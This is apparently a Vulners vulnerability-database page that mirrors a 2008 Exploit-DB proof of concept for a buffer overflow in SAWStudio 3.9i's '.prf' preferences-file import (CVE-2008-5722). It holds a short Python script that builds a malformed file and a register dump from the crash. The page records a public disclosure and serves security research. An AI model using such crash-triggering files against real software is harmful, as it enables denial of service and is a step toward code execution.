Lucene search
+L

SAWStudio 3.9i - '.prf' Local Buffer Overflow (PoC)

🗓️ 24 Dec 2008 00:00:00Reported by Encrypt3d.M!ndType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

SAWStudio 3.9i Buffer Overflow in '.prf' File (PoC

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5722
24 Dec 200800:00
circl
cve
CVE
CVE-2008-5722
26 Dec 200817:08
cve
cvelist
Cvelist
CVE-2008-5722
26 Dec 200817:08
cvelist
euvd
EUVD
EUVD-2008-5692
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-5722
26 Dec 200817:30
nvd
prion
Prion
Buffer overflow
26 Dec 200817:30
prion
# SAWStudio 3.9i (prf file) Buffer overflow Poc
# By:Encrypt3d.M!nd
#
# Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
#####################################################################
#
# when you import Prefernces File "prf file" contain long characters
# an overflow will occure,and the registers will be just like this:
#
#
# EAX:41414141 ECX:00000000 EDX:00561498 EBX:00000000
# ESP:0012DA5C EBP:0012FAD0 ESI:00561498 EDI:00000000
# EIP:7C91B1FA ntdll.7C91B1FA
#
# Access violation when writing to[41414151]
#
# Tested on: Windows XP SP3
#####################################################################



l337 = ("\x53\x41\x57\x53\x54\x55\x44\x49\x4F\x20\x50\x52\x45\x46\x45\x52\x45\x4E\x43\x45\x53\x20\x53\x54\x52\x55\x43\x54\x20\x20\x20\x20\x20")

pl = "A"*10000

file=open('enc.prf','w+')
file.write(l337+pl)
file.close()

# milw0rm.com [2008-12-24]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Dec 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.14874
37